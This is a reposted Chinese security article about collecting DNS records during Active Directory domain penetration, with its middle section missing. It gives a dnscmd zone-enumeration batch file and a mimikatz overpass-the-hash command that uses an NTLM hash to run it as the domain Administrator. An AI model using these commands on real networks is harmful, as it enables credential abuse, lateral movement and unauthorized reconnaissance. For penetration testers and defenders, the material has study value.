加入收藏 | 设为首页 | 会员中心 | 我要投稿 核心网 (https://www.hxwgxz.com/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 建站 > 正文

域渗透——DNS记录的获取

发布时间:2019-03-29 23:44:39 所属栏目:建站 来源:3gstudent
导读:0x00 前言 在域渗透中,对域环境的信息搜集很关键,如果我们获得了域内管理员的权限,那么如何能够快速了解域内的网络架构呢?DNS记录无疑是一个很好的参考。 本文将要介绍在域渗透中,获取DNS记录的常用方法。 0x01 简介 本文将要介绍以下内容: 通过DNS M

如下图:

域渗透——DNS记录的获取

如果想在命令行下实现整个流程,可以采用如下方法:

新建c:test1.bat,内容如下:

  1. Dnscmd WIN-F08C969D7FM.test.com /EnumZones > c:testout.txt 

Overpass-the-hash:

  1. mimikatz.exe privilege::debug "sekurlsa::pth /user:Administrator /domain:test.com /ntlm:A55E0720F0041193632A58E007624B40 /run:"cmd.exe /c c:test1.bat"" 

注:cmd.exe下"需要使用转义字符"

0x05 小结

本文介绍了在域内使用Overpass-the-hash实现dnscmd远程读取DNS记录的方法。

【编辑推荐】

  1. 适用于Windows,Linux和OS X的2018年优秀黑客工具
  2. 什么是 DNS,为什么它与你有关?根证书又是啥?
  3. 影响全国400万IP:家用路由器DNS遭篡改跳转黄赌网站
  4. 常见的几种Windows后门持久化方式
  5. 什么是DNS劫持攻击以及如何避免此类攻击?
【责任编辑:武晓燕 TEL:(010)68476606】
点赞 0

(编辑:核心网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

热点阅读